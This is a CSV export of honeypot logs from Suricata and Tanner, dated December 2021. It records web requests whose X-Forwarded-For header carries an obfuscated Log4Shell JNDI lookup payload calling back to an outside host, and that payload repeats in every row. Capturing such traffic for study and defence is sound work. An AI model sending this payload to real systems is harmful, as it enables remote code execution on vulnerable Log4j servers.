"2021-12-15T03:20:49.053Z",1,FncbvH0B6VkG8jKzYCVe,"logstash-suricata-2021.12.15",,"_doc","2b74f35c-7a7b-4007-8b90-f00473e26cc9",b8fefb716c89,"2cb0921b-8bb9-4665-9a8e-4ac699536dca",b8fefb716c89,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"64.227.188.216",35380,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text",27a505e858e000b7a478dfde26bf8378,"[]",446,CLOSED,false,1,,,,,,,1470014281374592,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"172.16.0.42","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,b8fefb716c89,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",446,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",170006509,,"{""timestamp"":""2021-12-15T03:20:49.053421+0000"",""flow_id"":1470014281374592,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""64.227.188.216"",""dest_port"":35380,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":446},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""27a505e858e000b7a478dfde26bf8378"",""stored"":false,""size"":446,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,alertgemini,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T03:20:49.053421+0000",,,,,,,,,Suricata,,,,
"2021-12-15T03:20:49.053Z",1,FXcbvH0B6VkG8jKzYCVe,"logstash-suricata-2021.12.15",,"_doc","2b74f35c-7a7b-4007-8b90-f00473e26cc9",b8fefb716c89,"2cb0921b-8bb9-4665-9a8e-4ac699536dca",b8fefb716c89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1470014281374592,"Peer 1 Network (USA) Inc.",13768,Jacksonville,NA,US,US,"United States",561,"64.227.188.216","30.1426","{""lon"":-81.5727,""lat"":30.1426}","-81.5727",32258,FL,Florida,"America/New_York",,,,,,,,,,,,,,,b8fefb716c89,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",446,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",170005858,,"{""timestamp"":""2021-12-15T03:20:49.053421+0000"",""flow_id"":1470014281374592,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""64.227.188.216"",""src_port"":35380,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":446}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"64.227.188.216",35380,,,,,,,,,,,,alertgemini,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T03:20:49.053421+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T03:20:48.797Z",1,CagbvH0BCXMCNTQLYMZ6,"logstash-tanner-2021.12.15",,"_doc","2b74f35c-7a7b-4007-8b90-f00473e26cc9",b8fefb716c89,"2cb0921b-8bb9-4665-9a8e-4ac699536dca",b8fefb716c89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"8edbfc7f-8215-42c8-aa2b-9823344c6a85",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Peer 1 Network (USA) Inc.",13768,Jacksonville,NA,US,US,"United States",561,"64.227.188.216","30.1426","{""lon"":-81.5727,""lat"":30.1426}","-81.5727",32258,FL,Florida,"America/New_York",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=8edbfc7f-8215-42c8-aa2b-9823344c6a85",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",b8fefb716c89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",96254,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=8edbfc7f-8215-42c8-aa2b-9823344c6a85""}, ""uuid"": ""fe9c8b83-57b9-4768-9667-b1206216ed38"", ""peer"": {""ip"": ""64.227.188.216"", ""port"": 35380}, ""status"": 200, ""cookies"": {""sess_uuid"": ""8edbfc7f-8215-42c8-aa2b-9823344c6a85""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""b42c6cf6-9547-48e2-b262-50240394a558""}}}, ""timestamp"": ""2021-12-15T03:20:48.797346""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","b42c6cf6-9547-48e2-b262-50240394a558","0.6.0",,,,,,,,,,,,,,,,,,"64.227.188.216",35380,,,,,,,,,200,,,alertgemini,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T03:20:48.797346",,,,,,,,,Tanner,,,"fe9c8b83-57b9-4768-9667-b1206216ed38",
"2021-12-15T03:20:47.438Z",1,whQbvH0B5e7x5EYnXGJR,"logstash-suricata-2021.12.15",,"_doc","2b74f35c-7a7b-4007-8b90-f00473e26cc9",b8fefb716c89,"2cb0921b-8bb9-4665-9a8e-4ac699536dca",b8fefb716c89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1470014281374592,"Peer 1 Network (USA) Inc.",13768,Jacksonville,NA,US,US,"United States",561,"64.227.188.216","30.1426","{""lon"":-81.5727,""lat"":30.1426}","-81.5727",32258,FL,Florida,"America/New_York",,,,,,,,,,,,,,,b8fefb716c89,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",4019,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",169996235,,"{""timestamp"":""2021-12-15T03:20:47.438949+0000"",""flow_id"":1470014281374592,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""64.227.188.216"",""src_port"":35380,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4019}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"64.227.188.216",35380,,,,,,,,,,,,alertgemini,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T03:20:47.438949+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T03:20:47.438Z",1,8agbvH0BCXMCNTQLXMVR,"logstash-suricata-2021.12.15",,"_doc","2b74f35c-7a7b-4007-8b90-f00473e26cc9",b8fefb716c89,"2cb0921b-8bb9-4665-9a8e-4ac699536dca",b8fefb716c89,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"64.227.188.216",35380,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text, with very long lines (488)",a11b96dc89694dc220111a6d8a9ab389,"[]",4019,CLOSED,false,0,,,,,,,1470014281374592,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"172.16.0.42","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,b8fefb716c89,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",4019,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",169996876,,"{""timestamp"":""2021-12-15T03:20:47.438949+0000"",""flow_id"":1470014281374592,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""64.227.188.216"",""dest_port"":35380,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4019},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (488)"",""gaps"":false,""state"":""CLOSED"",""md5"":""a11b96dc89694dc220111a6d8a9ab389"",""stored"":false,""size"":4019,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,alertgemini,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T03:20:47.438949+0000",,,,,,,,,Suricata,,,,
"2021-12-15T03:20:47.176Z",1,yXcbvH0B6VkG8jKzXCSC,"logstash-tanner-2021.12.15",,"_doc","2b74f35c-7a7b-4007-8b90-f00473e26cc9",b8fefb716c89,"2cb0921b-8bb9-4665-9a8e-4ac699536dca",b8fefb716c89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Peer 1 Network (USA) Inc.",13768,Jacksonville,NA,US,US,"United States",561,"64.227.188.216","30.1426","{""lon"":-81.5727,""lat"":30.1426}","-81.5727",32258,FL,Florida,"America/New_York",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",b8fefb716c89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",95475,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""fe9c8b83-57b9-4768-9667-b1206216ed38"", ""peer"": {""ip"": ""64.227.188.216"", ""port"": 35380}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""8edbfc7f-8215-42c8-aa2b-9823344c6a85""}}}, ""timestamp"": ""2021-12-15T03:20:47.176819""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","8edbfc7f-8215-42c8-aa2b-9823344c6a85","0.6.0",,,,,,,,,,,,,,,,,,"64.227.188.216",35380,,,,,,,,,200,,,alertgemini,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T03:20:47.176819",,,,,,,,,Tanner,,,"fe9c8b83-57b9-4768-9667-b1206216ed38",
"2021-12-15T02:27:12.388Z",1,gHXqu30B6VkG8jKzULFB,"logstash-suricata-2021.12.15",,"_doc","e9a3cad3-1a70-4afb-b260-cc3aee0b11c6",b54b400850b5,"ce6782e1-3f38-44a2-858e-a7d3ea13b253",b54b400850b5,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1063016527248681,,,,NA,US,US,"United States",,"157.245.40.77","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,b54b400850b5,"gzip, deflate",,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",21630,"HTTP/1.1",200,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",55993598,,"{""timestamp"":""2021-12-15T02:27:12.388381+0000"",""flow_id"":1063016527248681,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""157.245.40.77"",""src_port"":53580,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":21630}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"157.245.40.77",53580,,,,,,,,,,,,busypie,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T02:27:12.388381+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T02:27:12.388Z",1,gXXqu30B6VkG8jKzULFB,"logstash-suricata-2021.12.15",,"_doc","e9a3cad3-1a70-4afb-b260-cc3aee0b11c6",b54b400850b5,"ce6782e1-3f38-44a2-858e-a7d3ea13b253",b54b400850b5,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"157.245.40.77",53580,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"MS Windows icon resource - 9 icons, 16x16, 16 colors, 16x16",4644f2d45601037b8423d45e13194c93,"[]",21630,CLOSED,false,1,,,,,,,1063016527248681,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"172.16.0.42","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,b54b400850b5,,,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",21630,"HTTP/1.1",200,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",55994255,,"{""timestamp"":""2021-12-15T02:27:12.388381+0000"",""flow_id"":1063016527248681,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""157.245.40.77"",""dest_port"":53580,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":21630},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""MS Windows icon resource - 9 icons, 16x16, 16 colors, 16x16"",""gaps"":false,""state"":""CLOSED"",""md5"":""4644f2d45601037b8423d45e13194c93"",""stored"":false,""size"":21630,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,busypie,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T02:27:12.388381+0000",,,,,,,,,Suricata,,,,
"2021-12-15T02:27:12.102Z",1,GRLqu30B5e7x5EYnUO1p,"logstash-tanner-2021.12.15",,"_doc","e9a3cad3-1a70-4afb-b260-cc3aee0b11c6",b54b400850b5,"ce6782e1-3f38-44a2-858e-a7d3ea13b253",b54b400850b5,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"4e6a8f52-b2e2-4b06-9b31-1d8cebc48330",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,NA,US,US,"United States",,"157.245.40.77","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=4e6a8f52-b2e2-4b06-9b31-1d8cebc48330",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",b54b400850b5,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",266337,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=4e6a8f52-b2e2-4b06-9b31-1d8cebc48330""}, ""uuid"": ""035399ad-996b-49dd-87b2-60898c1c684f"", ""peer"": {""ip"": ""157.245.40.77"", ""port"": 53580}, ""status"": 200, ""cookies"": {""sess_uuid"": ""4e6a8f52-b2e2-4b06-9b31-1d8cebc48330""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""bdc5bb57-4726-42e2-a665-af15e79a42e1""}}}, ""timestamp"": ""2021-12-15T02:27:12.102859""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","bdc5bb57-4726-42e2-a665-af15e79a42e1","0.6.0",,,,,,,,,,,,,,,,,,"157.245.40.77",53580,,,,,,,,,200,,,busypie,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T02:27:12.102859",,,,,,,,,Tanner,,,"035399ad-996b-49dd-87b2-60898c1c684f",
"2021-12-15T02:27:12.048Z",1,f3Xqu30B6VkG8jKzULFB,"logstash-suricata-2021.12.15",,"_doc","e9a3cad3-1a70-4afb-b260-cc3aee0b11c6",b54b400850b5,"ce6782e1-3f38-44a2-858e-a7d3ea13b253",b54b400850b5,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"157.245.40.77",53580,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text",06f7362b70fa8873a17bc8c48df1056f,"[]",1904,CLOSED,false,0,,,,,,,1063016527248681,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"172.16.0.42","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,b54b400850b5,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",1904,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",55992796,,"{""timestamp"":""2021-12-15T02:27:12.048010+0000"",""flow_id"":1063016527248681,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""157.245.40.77"",""dest_port"":53580,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":1904},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""06f7362b70fa8873a17bc8c48df1056f"",""stored"":false,""size"":1904,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,busypie,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T02:27:12.048010+0000",,,,,,,,,Suricata,,,,
"2021-12-15T02:27:12.048Z",1,fnXqu30B6VkG8jKzULFB,"logstash-suricata-2021.12.15",,"_doc","e9a3cad3-1a70-4afb-b260-cc3aee0b11c6",b54b400850b5,"ce6782e1-3f38-44a2-858e-a7d3ea13b253",b54b400850b5,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1063016527248681,,,,NA,US,US,"United States",,"157.245.40.77","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,b54b400850b5,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",1904,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",55992154,,"{""timestamp"":""2021-12-15T02:27:12.048010+0000"",""flow_id"":1063016527248681,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""157.245.40.77"",""src_port"":53580,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":1904}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"157.245.40.77",53580,,,,,,,,,,,,busypie,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T02:27:12.048010+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T02:27:11.822Z",1,GBLqu30B5e7x5EYnUO1p,"logstash-tanner-2021.12.15",,"_doc","e9a3cad3-1a70-4afb-b260-cc3aee0b11c6",b54b400850b5,"ce6782e1-3f38-44a2-858e-a7d3ea13b253",b54b400850b5,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,NA,US,US,"United States",,"157.245.40.77","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",b54b400850b5,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",265558,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""035399ad-996b-49dd-87b2-60898c1c684f"", ""peer"": {""ip"": ""157.245.40.77"", ""port"": 53580}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""4e6a8f52-b2e2-4b06-9b31-1d8cebc48330""}}}, ""timestamp"": 